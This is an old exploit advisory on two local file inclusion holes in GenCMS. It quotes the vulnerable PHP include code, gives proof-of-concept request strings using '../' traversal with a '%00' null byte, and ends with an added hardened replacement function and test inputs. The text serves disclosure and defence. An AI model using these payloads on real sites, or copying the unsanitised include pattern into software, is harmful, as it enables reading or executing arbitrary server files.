GenCMS
http://gencms.berlios.de/

eLwaux(c)2009

LFI
/show.php
----------------------------------------------------------------------------------------------------
$param = $_GET['p'];
if(empty($param)) $param = 'news';
//get right page
//$page = $param.'.php';

//static or dynamic
if(GC_FULLSTATIC)
{
    $page = $param.'.htm';
    staticpage($page);
}
else
{
    $page = GC_IPATH.'_base/sites/'.$param.'.php';
    dynamicpage($page);
}
----------------------------------------------------------------------------------------------------
PoC: /show.php?p=../../{FILE.PHP}%00

LFI
/admin/pages/SiteNew.php
----------------------------------------------------------------------------------------------------
if(!empty($_GET['step'])) $Step = $_GET['step'];
// (lines 15-22 not shown in the advisory)
if ($Step == "2")
{
    // general settings
    //include blocks from template config
    include_once(GC_IPATH.'templates/'.$_POST['Template'].'/config.php');
    $TPLBlocks = explode(';',$TemplateSettings);
}
----------------------------------------------------------------------------------------------------
PoC: /admin/pages/SiteNew.php?step=2& ( POST: Template=../{FILE.PHP}%00 )

# milw0rm.com [2009-07-10]
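Both excerpts concatenate a request parameter straight into an include path. The block below is an added example of a hardened replacement, not code from GenCMS or from the advisory author; resolve_include(), the temporary directory layout and the sample inputs are hypothetical and constructed for the demonstration.

```php
<?php
// Added example, not GenCMS code. resolve_include() and the demo tree are hypothetical.
function resolve_include(string $baseDir, string $name, string $suffix): ?string
{
    // 1. Allowlist: the name must be one path component of letters, digits,
    //    '_' or '-'. \A and \z anchor the whole string, so '/', '\', '.',
    //    a NUL byte or a trailing newline all fail the match.
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name) !== 1) {
        return null;
    }
    // 2. Containment: canonicalise both paths and require the target to sit
    //    under the base directory. This also rejects a symlink that points
    //    outside the base, and names that do not exist (realpath() === false).
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name . $suffix);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed sample tree standing in for GC_IPATH.
$root = sys_get_temp_dir() . '/gencms_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/_base/sites', 0700, true);
mkdir($root . '/templates/default', 0700, true);
file_put_contents($root . '/_base/sites/news.php', "<?php // page\n");
file_put_contents($root . '/templates/default/config.php', "<?php // config\n");
file_put_contents($root . '/secret.php', "<?php // outside both base directories\n");

// show.php: 'p' selects a page under _base/sites/ (empty falls back to 'news').
foreach (['news', '', '../../secret', "../../secret.php\0", 'missing'] as $p) {
    $page = resolve_include($root . '/_base/sites', $p === '' ? 'news' : $p, '.php');
    printf("p=%-24s %s\n", json_encode($p, JSON_UNESCAPED_SLASHES),
        $page === null ? 'rejected' : 'allowed');
}

// SiteNew.php: 'Template' selects a directory under templates/.
foreach (['default', "../secret.php\0", 'default/..'] as $tpl) {
    $cfg = resolve_include($root . '/templates', $tpl, '/config.php');
    printf("Template=%-17s %s\n", json_encode($tpl, JSON_UNESCAPED_SLASHES),
        $cfg === null ? 'rejected' : 'allowed');
}
```

In the two scripts, the returned path would replace the concatenated string passed to dynamicpage() or include_once(), and a null result should end the request with an error page instead of an include.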